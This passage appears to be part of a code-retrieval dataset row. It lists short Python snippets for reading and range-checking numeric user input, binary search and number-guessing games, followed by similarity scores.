enterInteger(CustomMessage=\"Please input a number smaller than \" + str(max) + 
\": \")\r\n\r\n return number", "def constrain(inputVal, lower_limit, upper_limit):\n \n if (inputVal < lower_limit):\n return lower_limit\n elif (inputVal > upper_limit):\n return upper_limit\n else:\n return inputVal", "def _int_input_in_range(self, print_out, range_):\n try:\n i = int(input(print_out))\n assert range_[0] <= i <= range_[1]\n return i\n except AssertionError:\n print('Please, enter a vaild number')\n return None\n except ValueError:\n print('Please, enter a number not a string')\n return None", "def translate_num(number, lower_bound, upper_bound):\n try:\n value = int(number, 0)\n if value < lower_bound or value > upper_bound:\n raise translate_num_out_of_range(value, lower_bound, upper_bound)\n else:\n return value\n except:\n raise translate_num_error(number)", "def get_puzzle_no():\r\n \r\n puzzle_no = int(input(\"Enter the number of the puzzle to print the trace of (1-25): \"))\r\n while puzzle_no < 1 or puzzle_no > 25:\r\n print(\"Choice is invalid! Try again\")\r\n puzzle_no = int(input(\"Enter the number of the puzzle to print solution of (1-25): \"))\r\n \r\n return puzzle_no", "def binary_search(low, high, actual_number):\n tries = 0\n guess = 0\n\n n = list(range(low, high + 1))\n min = 0\n max = len(n)\n\n #Find the midpoint\n while max >= min:\n #finds the average of the min and the difference between max and min.\n MidPoint = math.floor(min + (max - min)/2)\n #check midpoint is the answer\n if n[MidPoint] is actual_number:\n return {\"guess\": guess, \"tries\": tries}\n #Higher or lower than midpoint\n elif n[MidPoint] > actual_number:\n #add try\n tries +=1\n guess = n[MidPoint]\n #new maximum\n max = MidPoint - 1\n \n else:\n #add try\n tries += 1\n guess = n[MidPoint]\n #new minimum is the midpoint + 1\n min = MidPoint + 1\n return {\"guess\": guess, \"tries\": tries}", "def get_int(self):\n while True:\n try:\n choice = int(input(\"Choose: \"))\n if 1 <= choice <= len(self.menu):\n return choice\n print(\"Invalid choice.\")\n except (NameError,ValueError, TypeError,SyntaxError):\n print(\"That was not a number, genious.... :(\")", "def ask_input(player, row_or_column):\n\n row_or_column_number = ask_input_helper(player, row_or_column)\n while row_or_column_number not in range(board_size):\n print \"Please choose a number within the range.\" \n row_or_column_number = ask_input_helper(player, row_or_column)\n return row_or_column_number", "def show_menu():\n while True:\n try:\n display_menu()\n ans = int(input(\"Enter your selection [1-4]: \"))\n if ans in range(1, 7):\n return ans\n raise ValueError()\n except Exception as Ex:\n print_error()\n continue", "def get_positive_int(prompt):\n while True:\n n = get_int(prompt)\n if 0 <= n and n < 24:\n break\n return n", "def getHenhouseDisplayMenuChoice ():\r\n while True :\r\n try :\r\n choice = int(input('Select an option: '))\r\n if 0 <= choice <= 2 :\r\n break \r\n else :\r\n print('Please enter a valid option')\r\n except ValueError :\r\n print('Please enter a valid option')\r\n return(choice)", "def compare_numbers():\n compareOld = None\n\n while True:\n compareInput = input(\"Please provide a number. 
Quit with 'done'\")\n if compareInput == 'done':\n break\n \n try:\n compareNumber = int(compareInput)\n\n if compareOld is None:\n print(\"This is your first number\")\n elif compareNumber == compareOld:\n print(\"Your number is the same as before!\")\n elif compareNumber < compareOld:\n print(\"Your number is less than before!\")\n elif compareNumber > compareOld:\n print(\"Your number is bigger than before!\")\n compareOld = compareNumber\n except ValueError:\n print(\"You need to provide a number\")", "def validate_num(number):\n\n if number <= 0:\n new_num = int(raw_input(\"Oops, your number has to be greater than 0. Please pick again: \"))\n return validate_num(new_num)\n\n else:\n return number", "def range_function(num, start_range, end_range):\n if num > start_range and num < end_range:\n print(num, \"is in the range.\\n\")\n elif num < start_range or num > end_range:\n print(num, \"is not in the range.\\n\")", "def query_number(question, default=1):\n if default is None:\n prompt = \" [] \"\n else:\n prompt = \" [%d] \" % default\n\n while True:\n sys.stdout.write(question + prompt)\n choice = input().lower()\n if default is not None and choice == '':\n return int(default)\n elif choice.isdigit():\n return int(choice)\n else:\n sys.stdout.write(\"Please respond with a number\\n\")", "def input_int(question):\n while True:\n try:\n value = int(input(question))\n except (SyntaxError, NameError) as exception:\n print(\"Invalid entry. Try again.\")\n continue\n\n if value <= 0:\n print(\"Invalid entry. Try again.\")\n continue\n else:\n break\n\n return value", "def fn(lo, hi):\n if lo >= hi: return 0 # no need to guess \n ans = inf\n for mid in range(lo, hi+1): \n ans = min(ans, mid + max(fn(lo, mid-1), fn(mid+1, hi)))\n return ans", "def clamp(num,start,end):\n if num >= start and num <= end: return num\n elif num < start: return start\n elif num > end: return end", "def random_int_below(upper_bound):\r\n \r\n try:\r\n upper_bound = int(upper_bound)\r\n except ValueError:\r\n raise TypeError('number should be an integer')\r\n \r\n if upper_bound <= 0:\r\n raise ValueError('number must be greater than zero')\r\n \r\n \r\n # If upper_bound == 1, the math_log call will loop infinitely.\r\n # The only int in [0, 1) is 0 anyway, so return 0 here.\r\n # Resolves bug #927\r\n if upper_bound == 1:\r\n return 0\r\n \r\n k = int(1.00001 + math_log(upper_bound - 1, 2.0)) # 2**k > n-1 > 2**(k-2)\r\n r = random_nbit_int(k)\r\n while r >= upper_bound:\r\n r = random_nbit_int(k)\r\n return r", "def in_range(low, high, step=None):\n def check(value):\n if not low <= value < high:\n return False\n\n if step is not None:\n return (value - low) % step == 0\n return True\n\n return check", "def guess_the_number():\n # get a random number from 1 to 1000\n number = random.randrange(1, 1000)\n\n guess = 0\n gcounter = 0\n # compare guess and selected number\n while guess != number:\n # get user input\n guess = int(input('Guess my number between 1 to 1000: '))\n # compare with number\n if guess > number:\n print('Too high. Try again')\n gcounter += 1\n elif guess < number:\n print('Too low. 
Try again')\n gcounter += 1\n else:\n # if equal, congratulate the user\n print('Congratulations, you guessed the number!')\n print(f'You used {gcounter} guesses')\n # check the number of guesses and provide feedback\n if gcounter > 10:\n print('You should be able to do better')\n else:\n print('Either you know the secret or you got lucky.')\n # give the option to restart the game or quit.\n response = input((\"Would you like to play it again? \"\n \"('yes' or 'no'): \"))\n # check user response\n if response == 'yes':\n number = random.randrange(1, 100)\n guess = 0\n gcounter = 0\n elif response == 'no':\n print('Bye.')\n break\n else:\n print('Invalid response. Quitting...')\n break", "def ge(value, limit):\n return value >= limit", "def bisect_right(func, val, low, high):\n a = low\n b = high\n while b > a:\n guess = (a+b)//2\n\n if val >= func(guess):\n a = guess+1\n else:\n b = guess\n\n return a", "def check_crash(int_choice, map_number):\n # Check if input is only an int and if it is in the range of total map\n if isinstance(int_choice, int) and \\\n (int_choice in range(map_number + 1)):\n return True\n\n else:\n print(\"Input not a number or out of range !!!\")\n print(\"Wait 2seconds\")\n time.sleep(2)\n\n # Go back to previous state\n if GAME == \"NEW\":\n new_game()\n else:\n saved_game()", "def bisect_left(func, val, low, high):\n\n a = low\n b = high\n while b > a:\n guess = (a+b)//2\n\n if val > func(guess):\n a = guess+1\n else:\n b = guess\n\n return a", "def check_guess(guess):\n while True:\n print(\" Was \" + str(guess) + \" too high, too low, or correct?\")\n answer = input()\n answer= answer.lower()\n \n if answer == 'too low' or answer == 'to low':\n return -1\n elif answer == 'too high' or answer == 'to high':\n return 1\n elif answer == 'correct':\n return 0\n else:\n print(\"I don't understand. Please enter 'too low', too high', or 'correct'.\")", "def advancedGuessingGame():\n\n print(\"\\nWelcome to the guessing game!\")\n print(\"A number between _ and _ ?\")\n\n lowerBound = not_number_rejector(\"Enter Lower Bound: \")\n\n higher_number = False # we need to set an upper and lowerbound for game\n\n while not higher_number:\n upperBound = not_number_rejector(\"Enter Upper Bound: \")\n if upperBound > lowerBound:\n higher_number = True\n else:\n print(\"The upperbound is lower than you lowerbound: TRY AGAIN\")\n\n # above code ensures upper > lower, see stubbon_asker in EX1\n\n print(\"OK then, guess a number between {} and {} ?\".format(lowerBound, upperBound))\n lowerBound = int(lowerBound) # ensures integer is give (Not a letter)\n upperBound = int(lowerBound)\n\n actualNumber = random.randint(lowerBound, upperBound)\n\n guessed = False\n\n while not guessed:\n guessedNumber = not_number_rejector(\"Make a guess: \")\n print(\"You guessed {},\".format(guessedNumber),)\n if guessedNumber == actualNumber:\n print(\"HOW DID YOU GET THAT! It was {}\".format(actualNumber))\n guessed = True\n elif guessedNumber > upperBound:\n print(\"This is higher than the upperbound! Try again!\")\n elif guessedNumber < lowerBound:\n print(\"This is lower than the lowerbound! Try again!\")\n elif guessedNumber < actualNumber:\n print(\"{} is too small, try again\".format(actualNumber))\n else:\n print(\"{} is too big, try again \".format(actualNumber))\n return \"You got it!\"\n # the tests are looking for the exact string \"You got it!\". 
Don't modify that!", "def le(value, limit):\n return value <= limit", "def high_and_low(numbers):\n highest = max(numbers)\n lowest = min(numbers)\n return (highest,lowest)", "def get_int(nodesdict):\n\tlimit = len(nodesdict); \n\twhile True:\n\t\tnode_choice = input().strip().split(\" \")\n\t\tvalid = True\n\t\tfor node in node_choice: \n\t\t\ttry:\n\t\t\t\tnode_int = int(node)\n\t\t\texcept ValueError:\n\t\t\t\tprint(\"Please enter a series of number(s)!\", end= \" \")\n\t\t\t\tvalid = False; break\n\t\t\tif not 1 <= node_int <= limit:\n\t\t\t\tprint(f\"Please enter number(s) between 01 and {limit}:\", end=\" \")\n\t\t\t\tvalid = False; break\n\t\t\telif nodesdict[\"node{:02d}\".format(node_int)][\"remain\"] == \"--\":\n\t\t\t\tprint(\"'node{:02d}' is unavailable, please choose others:\".format(node_int), end=\" \")\n\t\t\t\tvalid = False; break\n\t\t\telif nodesdict[\"node{:02d}\".format(node_int)][\"remain\"] == 0:\n\t\t\t\tprint(\"'node{:02d}' is full, please choose others:\".format(node_int), end=\" \")\n\t\t\t\tvalid = False; break\n\t\tif valid: node_choice = [int(node) for node in node_choice]; return node_choice" ]
[ "0.8282392", "0.8165286", "0.8158761", "0.8158761", "0.8125007", "0.7887655", "0.74961793", "0.7476491", "0.7303107", "0.70028126", "0.69437313", "0.69389933", "0.69310325", "0.689875", "0.68148214", "0.67976105", "0.67912346", "0.6782751", "0.66932416", "0.6617285", "0.6519485", "0.65174717", "0.6454796", "0.6435012", "0.63620216", "0.6349941", "0.63387495", "0.629023", "0.62826866", "0.624005", "0.6228854", "0.621956", "0.6155883", "0.6147889", "0.6115897", "0.6100811", "0.6090449", "0.6084571", "0.6078378", "0.60727525", "0.6063732", "0.60561067", "0.60488915", "0.6046309", "0.6041088", "0.6017149", "0.59946084", "0.5994361", "0.59895945", "0.59879166", "0.5958363", "0.59535843", "0.5921712", "0.591126", "0.5904754", "0.59034115", "0.5901433", "0.5887408", "0.5885701", "0.58826977", "0.5838528", "0.58354527", "0.5805638", "0.57799745", "0.57594174", "0.5730284", "0.5728069", "0.5724878", "0.57031083", "0.56823266", "0.5676787", "0.5675158", "0.56719625", "0.56461036", "0.5643064", "0.5641472", "0.56367415", "0.5605116", "0.56036764", "0.55757445", "0.5568069", "0.55427366", "0.55402035", "0.5535841", "0.55175406", "0.5510341", "0.550868", "0.55013925", "0.5494664", "0.5477826", "0.5462469", "0.5455416", "0.5452521", "0.54284465", "0.54241735", "0.54171973", "0.5408572", "0.5408283", "0.5403756", "0.54036355" ]
0.67488945
18
Extracts feature vectors from a given model and dataset and writes them, along with labels, to a file. This function works for any model whose forward() method returns, on any given input x, the pair (prediction on x, feature vector for x) and, more generally, for any model whose second return value is a feature vector.
def extract_feature_vectors(model, data_loader, parameters, features_file_path): feature_vectors, label_vectors = [], [] # Set model to evaluation mode model.eval() # Show progress bar while iterating over mini-batches with tqdm(total=len(data_loader)) as progress_bar: for i, (X_batch, Y_batch) in enumerate(data_loader): # Dimensions of the input Tensor batch_size, channels, height, width = X_batch.size() # If GPU available, enable CUDA on data if parameters.cuda: X_batch = X_batch.cuda() Y_batch = Y_batch.cuda() # Wrap the input tensor in a Torch Variable X_batch_variable = Variable(X_batch, volatile=True) # Run the model on this batch of inputs, obtaining a Variable of predicted labels and a Variable of features Y_predicted, features = model(X_batch_variable) # Convert the features Variable (of size [batch_size, 1024]) to a Tensor, move it to # CPU, and convert it to a NumPy array features_numpy = features.data.cpu().numpy() # Move the labels Tensor (of size [batch_size, 14]) to CPU and convert it to a NumPy array Y_numpy = Y_batch.cpu().numpy() # For each example in the batch, record its features and labels for j in range(batch_size): feature_vectors.append(features_numpy[j,:]) label_vectors.append(Y_numpy[j,:]) progress_bar.update() utils.write_feature_and_label_vectors(features_file_path, feature_vectors, label_vectors)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def save_vectors (feat_vec = None, labels = None, file_extension = None):\n\n feat_file_name = 'output/' + file_extension + '.feature'\n label_file_name = 'output/' + file_extension + '.label'\n\n prettyPrint('Saving feature vector file: {0} ... \\n'\n 'Saving Labels file: {1} ... '.format(feat_file_name, label_file_name), color.CYAN)\n\n #Save feature vector to disk\n with open(feat_file_name, 'w') as f:\n pickle.dump(feat_vec, f)\n #Save label file\n with open(label_file_name, 'w') as f:\n pickle.dump(labels, f)", "def writeFeatures(features, labels, output_filename):\n\twith open(output_filename, 'w') as csvfile:\n\t fieldnames = features[0].keys()\n\t fieldnames.append('label')\n\t writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\n\t writer.writeheader()\n\t for i in range(len(features)):\n\t \tfeatures[i]['label'] = labels[i]\n\t \twriter.writerow(features[i])\n\n\treturn", "def write_svm_features(clf, vectorizer, round=1, filename=\"features\"):\n\n f = open(\"%s-round%d.txt\" % (filename, round), \"w\")\n weight_feature_pairs = zip(clf.coef_.tolist()[0], vectorizer.feature_names_)\n weight_feature_pairs.sort(key=lambda x:abs(x[0]), reverse=True)\n for weight, word in weight_feature_pairs:\n f.write(\"%s\\t%g\\n\" % (word, weight))\n f.close()", "def write_model_results(model, input_file, repr, tags, outpath):\n input, input_data = read_input(input_file)\n\n if repr == \"c\":\n x = utils.get_features(input, ixs=3)\n else:\n x = utils.get_features(input, chars=True)\n\n w_batcher = utils.AutoBatcher(x, x, batch_size=1, shuffle=False)\n labels = []\n for inputs, _ in w_batcher.get_batches():\n output = torch.max(model(inputs), 1)[1]\n labels += output.cpu().data.numpy().tolist()\n\n predictions = utils.NEWLINE.join([\"{} {}\".format(input_data[i], tags[labels[i]])\\\n for i in range(len(input_data))])\n with open(outpath, \"w\") as outfile:\n outfile.write(predictions)", "def write_model(clf, filename):\n joblib.dump(clf, filename)", "def write_feature_labels(output, feature_labels):\n with open(os.path.join(output, 'features.list'), 'w') as out_file:\n out_file.write('\\n'.join(feature_labels))", "def write_predictions_to_file(predictor, testDataFname, enc, outputFname, features=None):\n\n testData, _, testDataIds, _ = make_data(testDataFname, features=features, enc=enc)\n\n dt = datetime.now()\n predictions = predictor.predict(testData)\n print 'predicting took', datetime.now() - dt\n\n featureSelectionOutput = np.transpose(np.vstack((testDataIds, predictions.round().astype(int))))\n\n with open(outputFname, 'wb') as outputFile:\n writer = csv.writer(outputFile)\n writer.writerow(['id', 'loss'])\n writer.writerows(featureSelectionOutput)", "def save_model(self):\n\n self.check_model()\n\n with open(self.filename, 'wb') as file:\n pickle.dump({'model': self.model, 'vec': self.vectorizer, 'vec_data': self.vectorized_data,\n 'df': self.df_topic_keywords}, file)", "def save_features(model, config_dict, steps, dataset):\n if config_dict['inference_only']:\n model.load_weights(config_dict['checkpoint']).expect_partial()\n\n # @tf.function\n def get_features_step(x):\n predictions, features = model(x, training=False)\n # Downsample further with one MP layer, strides and kernel 2x2\n # The result per frame is 4x4x32.\n # features = tf.keras.layers.TimeDistributed(\n # tf.keras.layers.MaxPool2D())(features)\n # # The result per frame is 1x32.\n # features = tf.keras.layers.TimeDistributed(\n # tf.keras.layers.GlobalAveragePooling2D())(features)\n features = 
tf.keras.layers.Flatten()(features)\n return predictions, features\n\n features_to_save = []\n\n with tqdm(total=steps) as pbar:\n for step, sample in enumerate(dataset):\n if step > steps:\n break\n pbar.update(1)\n to_save_dict = {}\n x_batch_train, y_batch_train, paths = sample\n preds, flow_rgb_map_merge = get_features_step(x_batch_train)\n to_save_dict['paths'] = paths\n to_save_dict['preds'] = preds\n to_save_dict['features'] = flow_rgb_map_merge\n to_save_dict['y'] = y_batch_train\n features_to_save.append(to_save_dict)\n features_to_save = np.asarray(features_to_save)\n np.savez_compressed(config_dict['checkpoint'][:18] + '_saved_features_20480dims', features_to_save)", "def transform_word_vectors(self):\n print('Transforming word vectors')\n \n self.train_X_tfidfvec = self.get_word_vectors(self.train_X)\n self.val_X_tfidfvec = self.get_word_vectors(self.val_X)\n self.test_X_tfidfvec = self.get_word_vectors(self.test_X)\n if self.savename is not None:\n with open(self.savename + '_X_tfidfvec.obj','wb') as f:\n pickle.dump((self.train_X_tfidfvec,self.val_X_tfidfvec,self.test_X_tfidfvec),f) \n print('Done transforming word vectors')", "def save_features_to_file(path: str, features: Data_dict_type, labels: Labels_dict_type_numpy):\n for key, item in features.items():\n filename = key\n values, sample_rate = item\n window_labels = labels[filename].reshape((-1, 1))\n concatenated_data = np.concatenate(\n [np.array([i for i in range(values.shape[0])])[..., np.newaxis], # window_idx\n values, # features\n window_labels], axis=-1) # labels\n df_to_save = pd.DataFrame(data=concatenated_data)\n columns = ['window_idx'] + ['feature_%i' % i for i in range(values.shape[-1])] + ['label']\n df_to_save.columns = columns\n df_to_save.to_csv(os.path.join(path, filename.split('.')[0] + '.csv'), index=False)", "def save_predictions(model, dataset, output_dir):\n preds = model.predict(dataset, verbose=1)\n preds = scipy.special.softmax(preds, 1) # Apply softmax\n with tf.io.gfile.GFile(os.path.join(output_dir, 'test_preds.pkl'), 'wb') as f:\n pickle.dump(preds, f)", "def write_model_data(model, filename):\n data = lasagne.layers.get_all_param_values(model)\n filename = os.path.join('./', filename)\n filename = '%s.%s' % (filename, PARAM_EXTENSION)\n with open(filename, 'w') as f:\n pickle.dump(data, f)", "def generate_and_save_train_features(train_input, train_output, bag_of_words, tfidf):\n df_train = get_df(train_input)\n train_words = np.array(df_train.text.str.lower().values)\n\n bag_of_words.fit(train_words)\n\n train_words_binary_matrix = bag_of_words.transform(train_words)\n feature_names = bag_of_words.get_feature_names_out()\n\n tfidf.fit(train_words_binary_matrix)\n train_words_tfidf_matrix = tfidf.transform(train_words_binary_matrix)\n\n save_matrix(df_train, train_words_tfidf_matrix, feature_names, train_output)", "def save_all_features(nb_samples, source=\"./datasets/D1/images/\", dest=\"./datasets/D1/features/\", input_size=(416, 416), batch_size=16):\n\n # check if the directory exists, and if not make it\n if not os.path.exists(dest):\n os.makedirs(dest)\n\n # define image height and width\n (img_height, img_width) = input_size\n\n # build the VGG16 network and extract features after every MaxPool layer\n model = VGG16(weights='imagenet', include_top=False)\n\n c1 = model.layers[-16].output\n c1 = GlobalAveragePooling2D()(c1)\n\n c2 = model.layers[-13].output\n c2 = GlobalAveragePooling2D()(c2)\n\n c3 = model.layers[-9].output\n c3 = GlobalAveragePooling2D()(c3)\n\n c4 = 
model.layers[-5].output\n c4 = GlobalAveragePooling2D()(c4)\n\n c5 = model.layers[-1].output\n c5 = GlobalAveragePooling2D()(c5)\n\n\n model = Model(inputs=model.input, outputs=(c1, c2, c3, c4, c5))\n\n # always save your weights after training or during training\n model.save_weights('first_try.h5')\n model.save('model_save')\n\n # define image generator without augmentation\n datagen = ImageDataGenerator(rescale=1. / 255.)\n\n generator = datagen.flow_from_directory(\n source,\n target_size=(img_height, img_width),\n batch_size=batch_size,\n class_mode=\"sparse\",\n shuffle=False)\n\n # generate and save features, labels and respective filenames\n steps = nb_samples / batch_size + 1\n X = model.predict_generator(generator, steps)\n Y = np.concatenate([generator.next()[1] for i in range(0, generator.samples, batch_size)])\n names = generator.filenames\n\n for n, i in enumerate(X):\n print(\"Saving \" + n + \" and \" + i)\n with open(dest + \"X-\" + str(img_height) + \"-c\" + str(n + 1) + \"-AVG.npy\", 'w') as f:\n np.save(f.name, i)\n\n if not os.path.exists(dest + \"Y.npy\"):\n with open(dest + \"Y.npy\", 'w') as f:\n np.save(f.name, Y)\n\n if not os.path.exists(dest + \"filenames.npy\"):\n with open(dest + \"filenames.npy\", 'w') as f:\n np.save(f.name, names)", "def dump_vecs():\n v_file = os.path.join(TMP_DIR, 'vectorizer.pickle')\n d_file = os.path.join(TMP_DIR, 'dectorizer.pickle')\n f_file = os.path.join(TMP_DIR, 'freq.pickle')\n \n with open(v_file, 'wb') as f:\n pickle.dump(VECTORIZER, f)\n with open(d_file, 'wb') as f:\n pickle.dump(CECTORIZER, f)", "def cross_validation(feature_train, help_rank_train, model_name):\n clf = svm.SVC(kernel='linear', C=1).fit(feature_train, help_rank_train)\n clf_model = open(model_name,'wb')\n dump(clf, clf_model, -1)\n return", "def output():\n\n if args.top and not args.tfidf and not args.svd:\n most_frequent(vector).to_csv(path_or_buf=\"top{}_vectorfile.csv\".format(args.top))\n\n elif args.top and args.tfidf and not args.svd:\n tfidf_transform(most_frequent(vector)).to_csv(path_or_buf=\"tfidf_top{}.csv\".format(args.top))\n\n elif args.top and args.tfidf and args.svd:\n svd_transform(tfidf_transform(most_frequent(vector)), indexes).to_csv(path_or_buf=\"svd{}_tfidf_topn.csv\".format(args.svd))\n\n elif args.tfidf and not args.top and not args.svd:\n tfidf_transform(vector).to_csv(path_or_buf=\"tfidf.csv\")\n\n elif args.svd and not args.top and not args.tfidf:\n svd_transform(vector, indexes).to_csv(path_or_buf=\"svd{}_vector.csv\".format(args.svd))\n\n elif args.tfidf and args.svd and not args.top:\n svd_transform(tfidf_transform(vector), indexes).to_csv(path_or_buf=\"svd{}_tfidf.csv\".format(args.svd))\n\n else:\n vector.to_csv(path_or_buf=\"vectorfile.csv\")", "def savemodel(self, fname):\n if not fname.endswith('.gz'):\n fname += '.gz'\n D = {'clf':self.clf, 'vocab':self.vocab,\n 'idxlabelmap':self.labelmap}\n with gzip.open(fname, 'w') as fout:\n dump(D, fout)\n print 'Save model into file: {}'.format(fname)", "def write_vecs(self, vecs_fname):\r\n header = f'{self.vectors.shape[0]} {self.vectors.shape[1]}'\r\n np.savetxt(vecs_fname, np.hstack([self.words.reshape(-1, 1), self.vectors]), fmt='%s', header=header)", "def walk_forward_cv(self):\r\n for output_name in self.output_names:\r\n print('\\t\\t\\t|--Prediction type: {}'.format(output_name))\r\n optimal_params_by_model = {}\r\n cv_metadata_by_model = {}\r\n cv_predictions_by_model = {}\r\n \r\n print('\\t\\t\\t\\t|--SVM Model')\r\n svm = SupportVectorMachine()\r\n svm.cv_params = 
self.cv_params\r\n svm.test_name = self.test_name\r\n svm.full_df = self.full_df\r\n svm.feature_names = self.feature_names\r\n svm.output_name = output_name\r\n svm.run_svm_cv()\r\n optimal_params_by_model['SVM'] = svm.svm_optimal_params\r\n cv_metadata_by_model['SVM'] = svm.metadata\r\n cv_predictions_by_model['SVM'] = svm.svm_cv_predictions\r\n \r\n self.optimal_params_by_output[output_name] = optimal_params_by_model\r\n self.cv_metadata_by_output[output_name] = cv_metadata_by_model\r\n self.cv_predictions_by_output[output_name] = cv_predictions_by_model", "def creating_feature_vector():\r\n\twordlist = []\r\n\tlabel = \"\"\r\n\tfw = open(\"feature_vector.txt\", \"w+\", encoding = \"utf-8\")\r\n\twith open(\"D:\\\\Python_Prac\\\\wordstag\\\\modules\\\\HI_EN_TRAIN.txt\", \"r\", encoding = \"utf-8\") as f:\r\n\t\tfor line in f:\r\n\t\t\twordlist.append(line)\r\n\t\tfor index, line in enumerate(wordlist):\r\n\t\t\tif line == \"\\n\":\r\n\t\t\t\tcontinue\r\n\t\t\tcontext = line.split(\"\\t\")\r\n\t\t\tlabel = context[1]\r\n\t\t\tfeature_vector = label+\" \"\r\n\t\t\tngram_vector = ngram_frequency(str(context[0]))\r\n\t\t\tfor vector in ngram_vector:\r\n\t\t\t\tfeature_vector += str(vector)+\" \"\r\n\t\t\tfeature_vector += str(is_english(context[0]))+\" \"\r\n\t\t\tfeature_vector += str(is_hindi(context[0]))+\" \"\r\n\t\t\tfeature_vector += str(is_abbr(context[0]))+\" \"\r\n\t\t\tfeature_vector += str(med_in_english(context[0]))+\" \"\r\n\t\t\tfeature_vector += str(med_in_hindi(context[0]))+\" \"\r\n\t\t\tbefore = [0,0,0]\r\n\t\t\tafter = [0,0,0]\r\n\t\t\tfor i in range(3):\r\n\t\t\t\tif (index-i) < 0 or (index-i+1) > len(wordlist)-1:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tbefore[2-i] = get_word_context(wordlist[index-i+1].split(\"\\t\")[0])\r\n\t\t\tfor i in range(3):\r\n\t\t\t\tif (index+i+1) > len(wordlist)-1:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tafter[2-i] = get_word_context(wordlist[index+i+1].split(\"\\t\")[0])\r\n\t\t\tfor i in before:\r\n\t\t\t\tfeature_vector += str(i)+\" \"\r\n\t\t\tfor i in after:\r\n\t\t\t\tfeature_vector += str(i)+\" \"\r\n\t\t\tfeature_vector += \"\\n\"\r\n\t\t\tfw.write(feature_vector)\r\n\t\t\tprint(\"Proceeding...\"+str(index+1)+\" of 16683\")\r\n\r\n\tfw.close()", "def generate_and_save_test_features(test_input, test_output, bag_of_words, tfidf):\n df_test = get_df(test_input)\n test_words = np.array(df_test.text.str.lower().values)\n\n test_words_binary_matrix = bag_of_words.transform(test_words)\n test_words_tfidf_matrix = tfidf.transform(test_words_binary_matrix)\n feature_names = bag_of_words.get_feature_names_out()\n\n save_matrix(df_test, test_words_tfidf_matrix, feature_names, test_output)", "def save_models(\n output_path,\n asv_model,\n asv_preprocessing_parameters,\n cm_feature_network,\n cm_model,\n bonafide_cm_features\n):\n asv_state_dict = asv_model.state_dict()\n # Add preprocessing data for Xvectors (if any)\n asv_state_dict.update(asv_preprocessing_parameters)\n torch.save(asv_state_dict, output_path + \"_asv_model\")\n\n # Use existing function to save CM model\n save_cm_model(\n cm_feature_network,\n cm_model,\n bonafide_cm_features,\n output_path + \"_cm_model\"\n )", "def get_model_output_and_feature(\n model,\n batch_x\n):\n outputs, features = model.get_output_and_feature(batch_x, training=False)\n return outputs, features", "def dump_slice_dataset(X: csr_matrix,\n y: csr_matrix,\n feat_file: Union[str, TextIOWrapper],\n label_file: Union[str, TextIOWrapper]) -> None:\n if isinstance(feat_file, str):\n feat_file = open(feat_file, 'w')\n elif 
isinstance(feat_file, TextIOWrapper):\n pass\n else:\n raise TypeError(f'feature_file is type {type(feat_file)} but should be either str or TextIOWrapper')\n\n if isinstance(label_file, str):\n label_file = open(label_file, 'w')\n elif isinstance(label_file, TextIOWrapper):\n pass\n else:\n raise TypeError(f'label_file is type {type(label_file)} but should be either str or TextIOWrapper')\n\n if X.shape[0] != y.shape[0]:\n raise Exception('X and y must have same shape')\n\n # 1. create sparse label file\n # format:\n # The first line of both the files contains the number of rows\n # the label file contains indices of active labels\n # and the corresponding value (always 1 in this case) starting from 0\n\n # write header\n label_header = f'{y.shape[0]} {y.shape[1]}\\n'\n label_file.write(label_header)\n # write data\n for label_vector in y:\n label_idx = label_vector.nonzero()[1]\n line = f'{\" \".join([f\"{label_id}:1\" for label_id in map(str, label_idx)])}\\n'\n label_file.write(line)\n\n label_file.close()\n\n # 2. create dense feature file\n # format:\n # The first line of both the files contains the number of rows\n # For features, each line contains D (the dimensionality of the feature vectors), space separated, float values\n\n # write header\n feature_header = f'{X.shape[0]} {X.shape[1]}\\n'\n feat_file.write(feature_header)\n # write data\n for feature_vector in X:\n line = f'{\" \".join(map(str, [i if i > 0.0 else int(0) for i in feature_vector[0].toarray().ravel()]))}\\n'\n feat_file.write(line)\n\n feat_file.close()\n\n return", "def save_to_arff(file_path, interactions, labels, selection,\n vectorizer=None, unlabelled=False, meka=True, use_bzip=True):\n if use_bzip:\n zipper = bz2\n else:\n zipper = gzip\n\n if vectorizer is None:\n vectorizer = CountVectorizer(lowercase=False, binary=True)\n\n X, y = interactions_to_Xy_format(interactions, selection)\n mlb = MultiLabelBinarizer(classes=sorted(labels), sparse_output=False)\n if not unlabelled:\n y = mlb.fit_transform(y)\n X = vectorizer.fit_transform(X)\n\n if meka:\n header = \"@relation 'PTMs: -C %d'\\n\\n\" % (len(labels))\n else:\n header = \"@relation PTMs\\n\\n\"\n\n for label in labels:\n header += \"@attribute %s {0,1}\\n\" % (label)\n for feature in (rename(x) for x in vectorizer.get_feature_names()):\n header += \"@attribute %s numeric\\n\" % (feature)\n\n header += \"\\n@data\\n\\n\"\n\n with zipper.open(file_path, 'wb') as fp:\n X = X.todense()\n if unlabelled:\n X = X.astype(str)\n y = y.astype(str)\n y[:, :] = '?'\n vec = np.hstack([y, X])\n np.savetxt(\n fp, X=vec, fmt='%s', delimiter=',', comments='', header=header\n )", "def gather_and_save_vectors(path, words_vec = collections.defaultdict(list), features = []):\n with open(path, 'rt', encoding='mac_roman') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=' ', quotechar='\"')\n for row in csvreader:\n words_vec, features = countize(row[3], row[2], words_vec, features)\n try:\n words_vec, features = countize(row[6], row[2], words_vec, features)\n except:\n pass\n pickle.dump(words_vec, open(\"ind_vectors.data\", \"wb\"))\n pickle.dump(features, open(\"i_features.data\", \"wb\"))\n return words_vec, features", "def save(self, model_out_file):\n\t\tvariables_dict = {v.name: v for v in tf.global_variables()}\n\t\tvalues_dict = self.sess.run(variables_dict)\n\t\tnp.savez(open(model_out_file, 'wb'), **values_dict)", "def save_features_to_file(self):\n if not os.path.exists(self.features_save_path):\n os.makedirs(self.features_save_path)\n for s in 
